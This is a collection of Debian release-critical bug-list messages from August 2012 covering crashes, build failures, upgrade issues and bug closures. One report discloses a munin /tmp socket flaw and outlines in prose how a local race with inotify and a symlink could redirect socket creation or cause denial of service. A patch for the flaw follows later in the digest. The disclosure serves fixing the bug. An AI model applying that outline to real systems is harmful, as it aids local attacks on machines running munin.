Bug#683993: sweethome3d crashes with java-6-openjdk-amd64, works with java-6-sun

2012-08-06 Thread Richard Scherping
Package: sweethome3d
Version: 3.5+dfsg-1
Severity: grave
Justification: renders package unusable

Dear Maintainer,

trying to run sweethome3d on my Wheezy amd64 system with Intel HD4000 graphics
crashes at startup. Switching Java from openjdk-6-jre 6b24-1.11.3-2 to sun-
java6-jre 6.26-3 (luckily still installed...) fixes the problem. As sun-
java6-jre is not in Debian repos anymore, sweethome3d seems to be broken.

richard@huron:~$ LANG=C sudo update-alternatives --config java
There are 4 choices for the alternative java (providing /usr/bin/java).

  SelectionPathPriority
Status

  0/usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java   1061  auto
mode
  1/usr/bin/gij-4.6 1046
manual mode
  2/usr/bin/gij-4.7 1047
manual mode
  3/usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java   1061
manual mode
* 4/usr/lib/jvm/java-6-sun/jre/bin/java 63
manual mode

Press enter to keep the current choice[*], or type selection number: 0
update-alternatives: using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java to
provide /usr/bin/java (java) in auto mode.
richard@huron:~$ sweethome3d
#
# A fatal error has been detected by the Java Runtime Environment:
#
#  SIGSEGV (0xb) at pc=0x7ff73513fd13, pid=2717, tid=140699529451264
#
# JRE version: 6.0_24-b24
# Java VM: OpenJDK 64-Bit Server VM (20.0-b12 mixed mode linux-amd64 compressed
oops)
# Derivative: IcedTea6 1.11.3
# Distribution: Debian GNU/Linux unstable (sid), package 6b24-1.11.3-2
# Problematic frame:
# C  [libGL.so.1+0x1ed13]  glXGetFBConfigs+0x53
#
# An error report file with more information is saved as:
# /tmp/hs_err_pid2717.log
#
# If you would like to submit a bug report, please include
# instructions how to reproduce the bug and visit:
#   http://icedtea.classpath.org/bugzilla
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Abgebrochen

richard@huron:~$ LANG=C sudo update-alternatives --config java
There are 4 choices for the alternative java (providing /usr/bin/java).

  SelectionPathPriority
Status

* 0/usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java   1061  auto
mode
  1/usr/bin/gij-4.6 1046
manual mode
  2/usr/bin/gij-4.7 1047
manual mode
  3/usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java   1061
manual mode
  4/usr/lib/jvm/java-6-sun/jre/bin/java 63
manual mode

Press enter to keep the current choice[*], or type selection number: 4
update-alternatives: using /usr/lib/jvm/java-6-sun/jre/bin/java to provide
/usr/bin/java (java) in manual mode.
richard@huron:~$ sweethome3d
[starts OK]

Installing libjogl-java, icedtea-netx-common and libnetx-java did not help.

Regards,

Richard



-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (900, 'testing'), (101, 'unstable'), (30, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=de_DE.utf8, LC_CTYPE=de_DE.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages sweethome3d depends on:
ii  icedtea-netx-common 1.2-2
ii  java-wrappers   0.1.25
ii  java3ds-fileloader  1.2+dfsg-1
ii  libbatik-java   1.7+dfsg-3
ii  libfreehep-graphicsio-svg-java  2.1.1-3
ii  libitext-java   2.1.7-3
ii  libjava3d-java  1.5.2+dfsg-8
ii  libsunflow-java 0.07.2.svn396+dfsg-9
ii  openjdk-6-jre   6b24-1.11.3-2
ii  sun-java6-bin   6.26-3
ii  sun-java6-jre   6.26-3

sweethome3d recommends no packages.

sweethome3d suggests no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#680814: Fix for bug #680814

2012-08-06 Thread Luca Falavigna
2012/8/6 David Prévot taf...@debian.org:
 Ouch, wouldn't that break the validity of the XML files? Maybe using the
 --nonet option of xsltproc would be proper.

I just tried using --nonet, using different positions, but I always get
failed to load external entity
http://www.oasis-open.org/docbook/xml/4.1.2/docbookx.dtd;


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#680626: Squeeze-Wheezy: dist-upgrade fails, /usr/bin/python unable to load libssl.so.1.0.0

2012-08-06 Thread Raphael Hertzog
Hello,

On Sun, 05 Aug 2012, Robert Luberda wrote:
  Processing triggers for doc-base ...
  /usr/bin/perl: symbol lookup error: /usr/lib/perl5/auto/UUID/UUID.so: 
  undefined symbol: Perl_xs_apiversion_bootcheck
  dpkg: error processing doc-base (--unpack):
   subprocess installed post-installation script returned error exit status 
  127
 
 This has been already reported as #673913. But to be honest I have no
 idea what to do with this bug. From doc-base point of view it has been
 fixed in doc-base 0.10.3, but you are still running 0.9.5.
 
 I believe the doc-base trigger was activated because some package
 providing /usr/share/doc-base file was upgraded during the dpkg run,
 and the doc-base trigger failed because system was not in consistent
 state. I've just learn about `interest-noawait' flag. Would using the
 flag in doc-base's triggers file help? Probably not, because still the
 flag won't be available in doc-base 0.9.5.

It won't help for this upgrade. But it might help for the next one
between wheezy and jessie. So it might still be a good idea to switch
to interest-noawait for packages like doc-base and man-db which trigger
for many packages.

 So maybe making libuuuid-perl to conflict with doc-base  0.10.3 as
 suggested in  #652638 will be a better idea? Honestly, I don't know.

That would be a klumsy work-around.

Another thing that we should be considering is changing APT's default
to avoid running the triggers so often. I filed
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=626599 some time ago
but it's not been activated yet :-(

I did a test-upgrade this weekend on my laptop's wife and I enabled
those APT's options:
DPkg::NoTriggers true;
PackageManager::Configure smart;
DPkg::ConfigurePending true;
DPkg::TriggersPending true;

And the upgrade went fine. I clearly saw the part of the upgrade where
libuuid-perl was unpacked before perl-base but no doc-base trigger was
activated in between IIRC.

Cheers,
-- 
Raphaël Hertzog ◈ Debian Developer

Get the Debian Administrator's Handbook:
→ http://debian-handbook.info/get/


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#683919: Can't use the final version of opus

2012-08-06 Thread Sjoerd Simons
On Mon, 2012-08-06 at 05:37 +0930, Ron wrote:
 
 If you can crash it, an example of how to reproduce that would probably
 be really helpful.

e.g:
http://cgit.freedesktop.org/gstreamer/gst-plugins-bad/commit/?h=0.10id=722b15abcaadbf32542184df889ed06d7a01f8fe

This fixes hitting an assertion when the opus header is not recognized.
Slomo is aware about the patches that are needed for the opus support in
our gstreamer to become release-quality, so this should hopefully be
fixed soon :)


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#683998: munin: allows creation of sockets at arbitrary locations (/tmp file vulnerability)

2012-08-06 Thread Helmut Grohne
Package: munin
Version: 1.4.5-3
Severity: serious
Tags: security

I wondered where a socket /tmp/munin-master-processmanager-12345.sock
would come from and whether it was created in a secure way. In the
presence of this bug report you may have guessed, that it is not. The
corresponding code can be found in
/usr/share/perl5/Munin/Master/ProcessManager.pm. Apparently rundir is
set to /tmp and the _prepare_unix_socket subroutine happily unlink(2)s
that path and creates a socket. So via a simple race condition (use
inotify!) we can place a symbolic link at the desired location and make
munin place a socket at an arbitrary location. It should also be
possible to turn this into a local denial of service by pointing to a
non-existent directory. Please evaluate the impact of this issue and
downgrade the severity accordingly. Fixing this issue should be easy
changing the default for rundir.

Helmut


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#680814: Fix for bug #680814

2012-08-06 Thread Jakub Wilk

* Luca Falavigna dktrkr...@debian.org, 2012-08-06, 08:40:

Ouch, wouldn't that break the validity of the XML files?


ACK, changing document declarations sounds like a bad idea.


Maybe using the --nonet option of xsltproc would be proper.


I just tried using --nonet, using different positions, but I always get
failed to load external entity
http://www.oasis-open.org/docbook/xml/4.1.2/docbookx.dtd;


Do you have docbook-xml installed?

I tried building the package with added docbook-xml build-dependency 
(but no other changes), and it builds fine here without network 
connection.


--nonet is an extra safety belt, but it's not really necessary if you 
have all DTDs installed.


--
Jakub Wilk


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#683727: closed by Dmitry Smirnov only...@member.fsf.org (Done: zabbix-server-mysql: Upgrade to 2.0 fails)

2012-08-06 Thread Michel Meyers
 As we emphasised in NEWS, README and TODO files, the database
 upgrade procedure is now completely manual.

I read the README.Debian (for the zabbix-server-mysql package) and it
didn't mention it. The NEWS file however did, my bad.

- Michel


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#682490: file permissions

2012-08-06 Thread Olivier Sallou
The biomaj-watcher is a web application (tomcat6).
To do so, application must be able to write in a number of
files/directories of the biomaj package.

I will investigate

dpkg-statoverride usage.


Olivier

-- 

gpg key id: 4096R/326D8438  (keyring.debian.org)
Key fingerprint = 5FB4 6F83 D3B9 5204 6335  D26D 78DC 68DB 326D 8438



Bug#682946: latest weekly PowerPC CD#1 stalls because it cant find aptitude

2012-08-06 Thread Rick Thomas


On Aug 5, 2012, at 12:31 AM, Jonathan Nieder wrote:


Hi Rick,

Rick Thomas wrote:


I just downloaded the beta1 netinst images for powerpc, i386 and
amd64.  I'll be testing them this weekend if I can get time.


Thanks!


Is the problem likely to be specific to the CD1 images and not show
up on netinst?  If so, I'll get a copy of the beta1 CD1 image as
well.


Yeah, my ignorant guess would be that it was CD-specific.


I tested both the powerpc-xfce+lxde-CD-1 and the amd64-netinst beta-1  
install CDs.  Neither showed the aptitude not found problem, so I  
think it's been fixed.


When writing the yaboot bootloader, the PowerPC install failed to  
notice two partitions from previous installations that contained  
bootable Debian root filesystems.  So the created yaboot.conf only  
lists the partition to which I was installing.  This is annoying, but  
not a show-stopper.  It's almost certainly not related to bug 682946.   
I'll file a separate installation report for it.


Rick


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#630893: [PATCH] Relicense listen/ripdump.c to permit commercial use and distribution

2012-08-06 Thread Philipp Kern
On Sun, Apr 29, 2012 at 12:47:50AM -0500, Jonathan Nieder wrote:
 Patrick Ouellette wrote:
 
  What about just noting the license for ripdump.c is now BSD?
 
 I assume that means you think the patch to listen/ripdump.c
 itself is ok.  A changelog entry stating
 
  * The permission notice in listen/ripdump.c has been changed to
use the BSD license.
 
 or whatever wording is preferred sounds fine to me.

What's blocking this clarification from reaching the archive?
Furthermore: ax25spyd was removed unnecessarily in the end, should it be
reintroduced?

Kind regards
Philipp Kern


signature.asc
Description: Digital signature


Bug#684004: calligra: Buffer overflow

2012-08-06 Thread Moritz Muehlenhoff
Package: calligra
Severity: grave
Tags: security
Justification: user security hole

Please see:
https://projects.kde.org/projects/calligra/repository/diff?rev=7d72f7dd8d28d18c59a08a7d43bd4e0654043103rev_to=7a9fa21b1f812b74b3e1501480dd14d10aeb347b

Reported here:
http://media.blackhat.com/bh-us-12/Briefings/C_Miller/BH_US_12_Miller_NFC_attack_surface_WP.pdf
 (page 39ff)

There's no CVE ID yet.

Cheers,
Moritz


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#679762: Please give back dolfin (hurd-i386 and i386)

2012-08-06 Thread Johannes Ring
Hi,

dolfin 1.0.0-7 failed to build on hurd-i386 and i386 due to a bug in
gcc-4.7. This bug was fixed in gcc-4.7 4.7.1-6, so please rebuild
dolfin on those architectures:

  gb dolfin_1.0.0-7 . hurd-i386 i386

This would clear the FTBFS bug #679762 (CCed).

Thanks,

Johannes


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#683576: epiphany-browser: No option available to delete/clear cookies

2012-08-06 Thread Vincent Blut
Le 06/08/2012 07:14, sat...@gmail.com a écrit :


 You will find the 'Personal Data' menu in gnome-shell's global
 menu, click on it and you'll find all you want ;-)

  
 Do you mean by Alt + F1  - Search for Personal Data ? Searching
 above returns/shows nothing. Is there anyway to launch it from run
 command ( alt + f2) or gnome-terminal? 

 -- 
 Satheesh Kumar Mohan


Nope, when you'll launch epiphany, its menu will be available on the top
GNOME Shell bar (with the new brand: 'Web'), click on it and you'll find
the 'Personal Data' menu section.

Have a good day Satheesh,
Vincent


Bug#683998: munin: allows creation of sockets at arbitrary locations (/tmp file vulnerability)

2012-08-06 Thread Helmut Grohne
Control: fixed 683998 2.0.1-1
Control: tags 683998 + patch

As said in my previous mail the issue stems from the rundir default.
This variable is set in /usr/share/perl5/Munin/Master/Config.pm. In the
wheezy version rundir is changed to MUNIN_STATEDIR, so wheezy is not
affected. I would assume that the fix is easy to backport. See patch
attached.

Helmut
--- a/usr/share/perl5/Munin/Master/Config.pm	2012-08-06 10:36:29.0 +0200
+++ b/usr/share/perl5/Munin/Master/Config.pm	2012-08-06 10:37:35.0 +0200
@@ -148,7 +148,7 @@
 		local_address= 0,
 		logdir   = $Munin::Common::Defaults::MUNIN_LOGDIR,
 		max_processes= $MAXINT,
-		rundir   = '/tmp',
+		rundir   = $Munin::Common::Defaults::MUNIN_STATEDIR,
 		timeout  = 180,
 		tls  = 'disabled',
 		tls_ca_certificate = $Munin::Common::Defaults::MUNIN_CONFDIR/cacert.pem,


Processed: Re: munin: allows creation of sockets at arbitrary locations (/tmp file vulnerability)

2012-08-06 Thread Debian Bug Tracking System
Processing control commands:

 fixed 683998 2.0.1-1
Bug #683998 [munin] munin: allows creation of sockets at arbitrary locations 
(/tmp file vulnerability)
Marked as fixed in versions munin/2.0.1-1.
 tags 683998 + patch
Bug #683998 [munin] munin: allows creation of sockets at arbitrary locations 
(/tmp file vulnerability)
Added tag(s) patch.

-- 
683998: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683998
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#660430: marked as done (textedit.app: Can't create a new document.)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 08:47:14 +
with message-id e1syiy2-00021x...@franck.debian.org
and subject line Bug#660430: fixed in textedit.app 4.0+20061029-3.3
has caused the Debian Bug report #660430,
regarding textedit.app: Can't create a new document.
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
660430: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=660430
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: textedit.app
Version: 4.0+20061029-3.1+b1
Severity: grave
Tags: upstream
Justification: renders package unusable

Hi,

when I click in menu / Document / New I expect to 
be created a new document so one can start to edit text
in it. Instead, nothing happen.

Regards from Pal

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=hu_HU.UTF-8, LC_CTYPE=hu_HU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages textedit.app depends on:
ii  gnustep-back0.20  0.20.1-2
ii  gnustep-base-runtime  1.22.1-2+b1
ii  gnustep-gpbs  0.20.1-2+b1
ii  gnustep-gui-runtime   0.20.0-2.1
ii  libc6 2.13-26
ii  libgcc1   1:4.6.2-14
ii  libgnustep-base1.22   1.22.1-2+b1
ii  libgnustep-gui0.200.20.0-2.1
ii  libobjc3  4.6.2-14

Versions of packages textedit.app recommends:
pn  aspell 0.60.7~20110707-1
pn  latex.service  none

textedit.app suggests no packages.

-- no debconf information


---End Message---
---BeginMessage---
Source: textedit.app
Source-Version: 4.0+20061029-3.3

We believe that the bug you reported is fixed in the latest version of
textedit.app, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 660...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastian Venthur vent...@debian.org (supplier of updated textedit.app package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Mon, 06 Aug 2012 10:26:36 +0200
Source: textedit.app
Binary: textedit.app
Architecture: source amd64
Version: 4.0+20061029-3.3
Distribution: unstable
Urgency: low
Maintainer: Gürkan Sengün gur...@linuks.mine.nu
Changed-By: Bastian Venthur vent...@debian.org
Description: 
 textedit.app - Text editor for GNUstep
Closes: 660430
Changes: 
 textedit.app (4.0+20061029-3.3) unstable; urgency=low
 .
   * Non-maintainer upload.
   * Fix Can't create a new document. Applied patch from Yavor Doganov
 (Closes: #660430)
Checksums-Sha1: 
 4f4d9df83b5d6fbc224c51c94bdd95ac2ade0b78 1834 textedit.app_4.0+20061029-3.3.dsc
 2eb0bdac86c2664588ed0419b04895971a212f06 3484 
textedit.app_4.0+20061029-3.3.diff.gz
 eb8db6afcbb2faa2b18b90e12b5416bbf73f8ec2 136994 
textedit.app_4.0+20061029-3.3_amd64.deb
Checksums-Sha256: 
 81a6fde09f49a31cd03e41483c996d4b6c5fe3454ea41e9843f9f5012292170a 1834 
textedit.app_4.0+20061029-3.3.dsc
 234dc44bb61e3807689b331ada27d09cbd69fd141dc7d30a85ec16a9c0eb54c2 3484 
textedit.app_4.0+20061029-3.3.diff.gz
 7a687dc5a082df1e437de58190bf03d9bb84cc2099e53f7aa392dc30f97a1b3a 136994 
textedit.app_4.0+20061029-3.3_amd64.deb
Files: 
 1ee2b7d7cb7c97d8ff1c67007a5442f3 1834 editors optional 
textedit.app_4.0+20061029-3.3.dsc
 a786c4378247c72c5eaf560704258bbd 3484 editors optional 
textedit.app_4.0+20061029-3.3.diff.gz
 fb0c38059b862f8fcc54e5c1e2cdb377 136994 editors optional 
textedit.app_4.0+20061029-3.3_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJQH4DXAAoJEI6IlUTZhQAN8nMP/RScg39UeBRYFHzoHy7sgqX2
hi94KCRPNuGFrsuVUb9swYNswuO0qaqdtlM9Hufp39bKEqGQN/VCgsmVCth1OoVd
E1y5vdAvHW/ZnAQMJGzwGJorKhVuy+SEh+MSfwL/WT1zDutAdHpKovB8hMefCQBc
am2K6mZOAeRoYjFumy6Q7rEAHMpfKIX5aE1qvajU4C6ZBnw9yiZuyihsb3bTgOqK
VaDdat6eHJXaUEcb6wVZTt4FrTQ9cGjzwmmZjbDqxIopQ0L+zrfwBJrmdIwtwcft
F1gMZWX9avgC4W8JH0xy3mLb4tt6JhczA1XPUliWk8yoAlrqJkmSzHZPlxvjJhK9
CsLUxb6SgN8f3hcdaT1s7RwL5EdefgOdYEA1S7XY134gimPoOs8r8rHEEnB1tBIS
a6PKJEl6ERTrYkWuQuoHvZh0N6edZZz7TuOU8c9MwNazUwj8Nlq/cbNpqD654eYT
j5YjkXtfP0ocPyuoVCKBJv7NxQWsx7ew/fetP2uW6wfbWrgMSZqWKbWwUfOr5+9J

Bug#680814: Fix for bug #680814

2012-08-06 Thread Julien Cristau
On Sun, Aug  5, 2012 at 22:43:50 +0200, Luca Falavigna wrote:

 tags 680814 + patch
 thanks
 
 
 This bug is reproducible only on systems without networking access.
 I'm attaching a patch which fixes the issue.
 
 Hi Release Team,
 would you consider this patch acceptable for an unblock request?

NAK on the part that changes the xml files, that shouldn't be necessary.
ACK for the added build-dep.

Cheers,
Julien


signature.asc
Description: Digital signature


Bug#681435: Plans for Catalyst in Wheezy

2012-08-06 Thread Jonas Genannt
Hello,

 Apparently there was no improvement there, so according to where we
 left the discussion at two weeks ago, Jonas Genannt should request the
 removal of Gitalist from Wheezy, correct?

Gitalist was removed by Adam D. Barratt. (#683964)

Greets,
Jonas


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: tagging 684004

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 684004 + upstream fixed-upstream pending
Bug #684004 [calligra] calligra: Buffer overflow
Added tag(s) upstream, pending, and fixed-upstream.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
684004: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684004
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#669445: marked as done (cccd: FTBFS: cddbp.c:100:3: error: format not a string literal and no format arguments [-Werror=format-security])

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 09:47:10 +
with message-id e1syju2-0004hn...@franck.debian.org
and subject line Bug#669445: fixed in cccd 0.3beta4-7.1
has caused the Debian Bug report #669445,
regarding cccd: FTBFS: cddbp.c:100:3: error: format not a string literal and no 
format arguments [-Werror=format-security]
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
669445: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=669445
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Source: cccd
Version: 0.3beta4-7
Severity: serious
Tags: wheezy sid
User: debian...@lists.debian.org
Usertags: qa-ftbfs-20120419 qa-ftbfs
Justification: FTBFS on amd64

Hi,

During a rebuild of all packages in sid, your package failed to build on
amd64.

Relevant part:
 gcc -c -g -O2 -fstack-protector --param=ssp-buffer-size=4 -Wformat 
 -Wformat-security -Werror=format-security -Wall `pkg-config --cflags 
 gtk+-2.0` -DMAILPROG=\/usr/bin/mail -i\ cddbp.c
 cddbp.c: In function 'cddbp_query':
 cddbp.c:100:3: error: format not a string literal and no format arguments 
 [-Werror=format-security]
 cc1: some warnings being treated as errors
 make[1]: *** [cddbp.o] Error 1

The full build log is available from:
   http://people.debian.org/~lucas/logs/2012/04/19/cccd_0.3beta4-7_unstable.log

A list of current common problems and possible solutions is available at 
http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot.  Internet was not
accessible from the build systems.


---End Message---
---BeginMessage---
Source: cccd
Source-Version: 0.3beta4-7.1

We believe that the bug you reported is fixed in the latest version of
cccd, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 669...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastian Venthur vent...@debian.org (supplier of updated cccd package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Mon, 06 Aug 2012 11:39:46 +0200
Source: cccd
Binary: cccd
Architecture: source amd64
Version: 0.3beta4-7.1
Distribution: unstable
Urgency: low
Maintainer: Uwe Hermann u...@debian.org
Changed-By: Bastian Venthur vent...@debian.org
Description: 
 cccd   - Small GTK+ CD player program
Closes: 669445
Changes: 
 cccd (0.3beta4-7.1) unstable; urgency=low
 .
   * Non-maintainer upload.
   * Fix FTBFS: cddbp.c:100:3: error: format not a string literal and no
 format arguments [-Werror=format-security] Applied Patch by Sebastian
 Ramacher (Closes: #669445)
Checksums-Sha1: 
 2473d5c9562b7a0ef8fa5528510fda9b59b09ee2 1665 cccd_0.3beta4-7.1.dsc
 79f63d6bb099c5761adc5ccb89cace9b96a0092e 7185 cccd_0.3beta4-7.1.debian.tar.gz
 ba83833da4bdc0d3b3bba6383ce8b4252b9329a2 38122 cccd_0.3beta4-7.1_amd64.deb
Checksums-Sha256: 
 ad0713c5c6014aadb182b35f0dae7a49485a542db4b5785918cd06f3dac65aeb 1665 
cccd_0.3beta4-7.1.dsc
 865e491867fab3f00415fc6aa7d7d1f0e0f373e5351de4991dbdc9dc0ebad834 7185 
cccd_0.3beta4-7.1.debian.tar.gz
 11c356a386efac41b7fd9949d1381c1f7ded0eac81a69dbd3b20fae0b25913aa 38122 
cccd_0.3beta4-7.1_amd64.deb
Files: 
 8bfae1a5338d344fbfb1afa5e64ad650 1665 sound extra cccd_0.3beta4-7.1.dsc
 8725bede8ddc1503b2f02c046c82ff35 7185 sound extra 
cccd_0.3beta4-7.1.debian.tar.gz
 3ea3e1dba439fd7ed7580815a6bb1836 38122 sound extra cccd_0.3beta4-7.1_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJQH5HEAAoJEI6IlUTZhQAN2e0QAL1rpAWGxFKqvcCwhY+cXVhL
TNTW3rTPERz6bVmv4adLmNenP4YbxuOM7ODXIv6Aw445mFJwhwevd/wH5WjHEXmB
9TrZOy5QoDCHgnHEZTLXcUQs0UpSM22TKYKFLxLufVLOKYOHq6rPPlXRl0tSgOze
6aGsx0ic/QofF6LDN2aUYmMkWtiflOY3Ota4j58qeT4ObeBgaeWjiyl9UiAZHAja
YioIKgc7XgB0iJYk61ydVhrFT96nir0Bo7f1kvsV7iIrSlk1lFzLszb5Nz4ohf59
KVFYKFhB2ZVEi3UHasXBRL5xuum02LrwC9pyngjrLPsmusvHwoV+2OWrh+oXEAOA
TfnbpUbt0Qq7q31Bg8HgX1ZkgIAloZ69Ho1nkOIO77u1SNmu+SyMAYjCAJiAsgFw
94Y01SsyHYOzLkUGzkDeNefsVRr718eWinuv5EPM+UEp+MHNsTsEw2prnFTM99sM
Zm/IymBHevpQYYa6Nm+bUyUKpRDOzBf8hi4D5HcCRJr3l5nLK+kkUod8NSi/uJS2
FuP7SE27rwVHzRy4gYwZJgb+Jc/dtZQT+e9XkDvi3lQ10RBImy3liGJ1KBHqQxv4

Bug#673153: marked as done (facturlinex2: Do not create libmysqlclient.so.16.0.0 → libmysqlclient.so symlink)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 10:02:17 +
with message-id e1syk8f-0008oq...@franck.debian.org
and subject line Bug#673153: fixed in facturlinex2 2.2.2-2
has caused the Debian Bug report #673153,
regarding facturlinex2: Do not create libmysqlclient.so.16.0.0 → 
libmysqlclient.so symlink
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
673153: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673153
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: facturlinex2
Version: 2.2.0-1
Severity: serious

Hi,

Your package is shipping a /usr/lib/libmysqlclient.so.16.0.0 →
/usr/lib/libmysqlclient.so symlink.

Creating that symlink is the responsability of libmysql-dev package.

If your package is dynamically loading this library, the sources should
be patched to load the library with the soname.

Cheers

Laurent Bigonville

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=fr_BE.utf8, LC_CTYPE=fr_BE.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash


---End Message---
---BeginMessage---
Source: facturlinex2
Source-Version: 2.2.2-2

We believe that the bug you reported is fixed in the latest version of
facturlinex2, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 673...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nicolas Lopez de Lerma Aymerich nico...@esdebian.org (supplier of updated 
facturlinex2 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Mon, 06 Aug 2012 10:15:00 +0200
Source: facturlinex2
Binary: facturlinex2
Architecture: source i386
Version: 2.2.2-2
Distribution: unstable
Urgency: low
Maintainer: Nicolas Lopez de Lerma Aymerich nico...@esdebian.org
Changed-By: Nicolas Lopez de Lerma Aymerich nico...@esdebian.org
Description: 
 facturlinex2 - ERP/CRM for small and medium businesses
Closes: 671115 673153
Changes: 
 facturlinex2 (2.2.2-2) unstable; urgency=low
 .
   * Update changelog whit bugs closed
   * Update source to new rev 467
   * Uploaded to Debian (Closes: #671115)
   * Update zeoslibs to version 7.0
   * Supresed the simbolic link of libmysqlclient.so in rules file (Closes: 
#673153)
   * Update dependences to mysql-client and mysql-server (Closes: #671115)
